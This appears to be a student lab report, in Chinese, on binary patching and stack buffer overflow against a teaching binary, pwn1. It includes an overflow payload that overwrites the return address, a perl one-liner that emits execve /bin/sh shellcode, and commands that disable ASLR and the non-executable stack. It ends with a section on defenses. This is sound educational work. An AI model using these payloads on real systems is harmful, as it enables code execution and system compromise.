exp1 逆向与Bof基础

                exp1逆向与Bof基础

   实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

--

• 三个实践内容如下：

  • 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
  • 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
  • 注入一个自己制作的shellcode并运行这段shellcode。

• 这几种思路，基本代表现实情况中的攻击目标:

  • 运行原本不可访问的代码片段
  • 强行修改程序执行流
  • 以及注入运行任意代码。  

  • 实验要求

    1：掌握NOP,JNE,JE,JMP,CMP汇编指令的机器码

    2： 掌握反汇编与十六进制编程器

    3：能正确修改机器指令改变程序执行流程

    4：能正确构造payload进行bof攻击

  • 预备知识

    • 熟悉Linux基本操作

    • 能看懂常用指令，如管道（|），输入、输出重定向（>)等。

    • 理解Bof的原理

    • 能看懂汇编、机器指令、EIP、指令地址

    • 会使用gdb,vi

实验步骤：

1直接修改程序机器指令，改变程序执行流程

1.1知识要求

• 掌握Call指令的机器码，了解EIP寄存器的功能，了解指令跳转的偏移计算

• 学习反汇编

• 1.2实现过程

1、下载目标文件pwn1,将其放入共享文件夹中

2、进入kali终端，使用 cp 指令复制pwn1 分别命名为pwn2、pwn3

3、使用指令 objdump -d pwn1 对pwn1进行反汇编指令，查看对应的代码

 

4、了解地址信息

5、vim pwn1编辑内容

 

6、使用 :%!xxd将显示模式切换为16进制模式

 

7、修改地址跳转

8、使用 :%!xxd -r 转为16进制原格式

9、wq保存退出

10、再使用 objdump -d pwn1 反汇编检查call指令跳转

11、./pwn1 运行代码，会得到shell提示符#

可以看见这里的ls显示就是当前文件夹里面对应的文件：

 

1.3小结

• Linux系统中 call 8048491 汇编代码在此处对应的机器指令为 e8 d7ffffff
• e8 为跳转的意思，在刚执行这条语句时，EIP存储的值为下调指令的地址，即 80484ba,d7ffffff是小端显示的 -41的补码，0x80484ba-41=8048491
• 要实现执行getshell,我们需要使计算结果为804847d
• 0x80484ba-0x804847d=0x000003d,所以我们要知道十进制-61的补码为ffffffc3
• 修改对应位置的机器码即可

2.通过构造输入参数，造成BOF攻击，改变程序执行流

知识要求：堆栈结构，返回地址c
学习目标：理解攻击缓冲区的结果，掌握返回地址的获取
进阶：掌握ELF文件格式，掌握动态技术

实现过程

我们的目标是触发函数getShell

该可执行文件正常运行是调用如下函数foo，这个函数有Buffer overflow漏洞

这里读入字符串，但系统只预留了（28）字节的缓冲区，超出部分会造成溢出，我们的目标是覆盖返回地址

上面的call调用foo,同时在堆栈上压上返回地址值:（80484ba）

下一步要确认输入字符串哪几个字符会覆盖到返回地址

用gdb调试pwn2，

 当输入的为1111111122222222333333334444444455555555可以看到eip的值0x35353535也就是5555的ASCII码

 

如果输入字符串1111111122222222333333334444444412345678，那 1234 那四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell

 确认用什么值来覆盖返回地址

getShell的内存地址，通过反汇编时可以看到，即0804847d。
接下来要确认下字节序，简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。

对比之前 eip 0x34333231 0x34333231 ，正确应用输入11111111222222223333333344444444\x7d\x84\x04\x08。

构造输入字符串

实验指导书中刘老师提示到：由于我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，所以先生成包括这样字符串的一个文件。

\x0a表示回车，如果没有的话，在程序运行时就需要手工按一下回车键。

 

然后将input的输入，通过管道符“|”，作为pwn1的输入。

 3.注入Shellcode并执行

3.1知识要求

• shellcode就是一段机器指令(code)，在实际应用中，凡是用来注入的机器指令段都被通称shellcode

• 掌握二种基本buf攻击中的一种

  1:retaddr+nop+shellcode

  2:nop+shellcode+retaddr

• 获取shellcode命令：

perl -e 'print "A" x 32;print "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

3.2具体指令步骤

1:ap-get install execstack /安装execstack命令/

2:execstack -s pwn3 / 设置堆栈可执行/

3:execstack -q pwn3 /查询文件的堆栈是否可执行/

4：echo "0" > /proc/sys/kernel/randomize_va_space /关闭地址随机化/

5：more /proc/sys/kernel/randomize_va_space /查询是否关闭地址随机化/

 

3.3实现过程

1：构造重定位文件，输入指令 perl -e 'print "A" x 32;print "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shell

2：注入此段攻击:(cat input_shellcode;cat) | ./pwn3

3:打开另一个终端，使用ps -ef | grep pwn3查看相应进程号

4：gdb进行调试

5：使用命令 atach + 进程号调试

6：使用 disassemble foo命令反汇编，设置断点查看注入buf的内存地址。

7： break *0x080484ae设置断点，并输入 c 命令继续执行

8：在输入c回车一下后在另外一个终端按次回车，再返回使用 info r esp查看地址。

9：使用命令 x/16x 查看内存内容，当我们找到了 0x01020304,就知道我们的shellcode就在后面，所以我们的Shellcode就是这个地址+4

10：修改重定位文件

11：执行成功 ！

 

4.Bof攻击防御技术

5.1. 从防止注入的角度。

在编译时，编译器在每次函数调用前后都加入一定的代码，用来设置和检测堆栈上设置的特定数字，以确认是否有bof攻击发生

5.2. 注入入了也不让运行

结合CPU的页面管理机制，通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上，也执行不了。

通过execstack -s pwn1 来设置堆栈可执行
通过execstack -q pwn1 来查询文件的堆栈是否可执行

 

 5.3. 增加shellcode的构造难度
shellcode中需要猜测返回地址的位置，需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实：应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR，地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。

 

/proc/sys/kernel/randomize_va_space用于控制Linux下 内存地址随机化机制（address space layout randomization)，有以下三种情况：
             0 - 表示关闭进程地址空间随机化。
            1 - 表示将mmap的基址，stack和vdso页面随机化。
            2 - 表示在1的基础上增加栈（heap）的随机化。

 

 实验感想

 因为有了上学期学习虚拟机的经历，所以对于kali的安装和应用挺顺利的，按照老师和同学给的实验指导书进行，实验进程有条不紊，只有在任务三gdb单步调试，continue时，没有去另一个终端按下回车而是在当前终端按下回车，最终的esp并不在ret，经过查看地址的数据，发现差了四个字节，应该是多了回车导致多执行了一条命令，使esp产生了变化，卡壳了好久。这次实验让我认识到自己在汇编等基础知识的学习还需要加强。其次通过实际的操作我也进一步感受到了网络攻防的基本步骤，对于网络攻防有了更深入的体会。